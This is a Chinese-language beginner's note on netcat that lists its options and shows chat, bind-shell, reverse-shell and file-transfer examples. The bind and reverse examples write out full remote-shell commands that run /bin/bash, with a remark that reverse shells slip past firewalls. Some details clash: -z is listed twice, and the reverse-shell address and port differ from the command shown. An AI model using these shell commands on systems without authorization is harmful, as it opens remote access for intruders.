NC入門筆記

簡介:

NC(全名NetCat)，在網絡界有"瑞士軍刀"的美譽。它小巧而強悍，被設計成一個穩定的後門工具，可以直接由其它程序和腳本輕鬆驅動。同時，它也是一個功能強大的網絡調試和探測工具，可以創建你須要的幾乎全部類型的網絡鏈接。

使用格式:

nc [options...] hostname port

nc -l -p port [-s addr] [options...] [hostname] [port]

主要參數:

-4 IPv4模式
-6 IPv6模式
-b, --bluetooth 藍牙模式 (默認爲L2CAP協議)

-e,--exec=CMD 鏈接創建後執行命令

-l 監聽入站鏈接

-n 指定數字的IP地址，不能用hostname 

-u UDP模式

-t TCP模式（默認模式）

-v 詳細輸出——用兩個-v可獲得更詳細的內容 

-w，--time=SECONDS 鏈接創建後的延時

-z 掃描模式，不會發送任何數據

-T，--ttl=TTL 自定義初始TTL

-z 將輸入輸出關掉——用於掃描時 

-x，--transfer 文件傳輸模式

-X ，--rev-transfer 反向文件傳輸模式

-s，--address=ADDRESS 本地源ip

使用舉例：

1. 交互數據傳輸（簡單聊天):

nc能夠做爲簡單的字符下聊天工具使用:

[本地] nc -lp 1234

[遠程] nc 222.24.51.53 1234

2. 正向鏈接：

注：遠程主機（ip：222.24.51.116）上運行nc -l -p 1234 -t -e /bin/bash監聽其本地端口，一旦鏈接創建，就執行其/bin/bash，本地主機鏈接到遠程主機，將已經鏈接的CMD重定向到1234端口的遠程主機。

[遠程主機] nc -l -p 1234 -t -e /bin/bash

[本地主機] nc -nvv 222.24.51.116 1234

 3. 反向鏈接：

注：先在本地主機（擁有公網IP）開啓1234 端口並監聽等待遠程主機鏈接；在遠程主機上將其 CMD 重定向到 IP 地址爲 192.168.1.102 端口號爲2012 的主機上。

[本地主機] nc -l –vv -p 1234

[遠程主機] nc -t -e /bin/bash 222.24.51.53 1234

 

總結：以上兩種鏈接方式中，反向鏈接就是反彈shell到本地，由於由遠程主機發送的數據請求其本地防火牆通常不會去攔截，故反向更易鏈接。

4. 文件傳輸：

從遠程主機把ap-wlan0文件傳送到本地並重命名爲ap-wlan文件：

[本地主機] nc -v -l -p 1234 > ./ap-wlan

[遠程主機] nc -vv 222.24.51.53 < /home/linger/ap-wlan0